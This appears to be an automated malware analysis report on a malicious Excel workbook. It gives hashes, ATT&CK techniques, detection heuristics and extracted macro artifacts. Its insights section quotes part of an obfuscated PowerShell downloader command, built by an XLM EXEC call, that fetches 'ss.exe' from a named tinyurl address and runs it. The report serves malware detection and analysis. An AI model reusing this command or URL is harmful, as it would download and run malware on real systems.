Office (OLE) / .XLS malware analysis — malicious · bed3af11cd9e097b

MALICIOUS

Office (OLE) / .XLS

88.0 KB Created: 2020-10-25 18:24:14 Authoring application: Microsoft Excel

MD5: 94726f51507bade75fcd2396857f7ff6 SHA-1: c4380a926930ace37c488ccde2d5b3742b46b733 SHA-256: bed3af11cd9e097b16a84c3379aba628011468826f1476e9d47a942bad2cc67f

140 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1059.001 PowerShell T1204.002 Malicious File

The sample contains both Excel 4.0 (XLM) and VBA macros, with the XLM macro explicitly calling an EXEC function. This function reconstructs a command to download a file named 'ss.exe' from 'https://tinyurl.com/y66uursp' using PowerShell and then execute it. The VBA macro also appears to be involved in triggering the XLM macro. The reconstructed command is: 'c md /c powershell -w 1 (nEw-oB`jecT Net.WebcL`IENt).('Down'+'loadFile').In' followed by the download and execution logic. The presence of these macros and the reconstructed command strongly indicate a downloader functionality.

Heuristics 4

ClamAV: Xls.Malware.Abracadabra-10031695-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Xls.Malware.Abracadabra-10031695-0
Auto_Open macro high OLE_VBA_AUTO

Auto_Open macro
Excel 4.0 (XLM) macro sheet present medium OLE_XLM_AUTOOPEN

Workbook contains an Excel 4.0 macro sheet sub-stream — XLM is rarely seen in modern legitimate workbooks and was a major Office malware vector during 2020-2022.
VBA macros detected medium OLE_VBA_MACROS

Document contains VBA macro code

Extracted artifacts 2

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`xlm_macros.txt` `353ac1b3eec7e14755bc4f56f1e71e38eb25a548091ed6d5f8e2f08928adbac5`	xlm-macro	oletools.olevba.extract_all_macros (XLM macro listing)	1726 bytes
`macros.bas` `953bf125fb95a97d67f1dfae6bad54545952dd76d888d2a1cbcc94e4187e5630`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	1065 bytes

Open this report in the interactive analyzer, or submit your own file for analysis.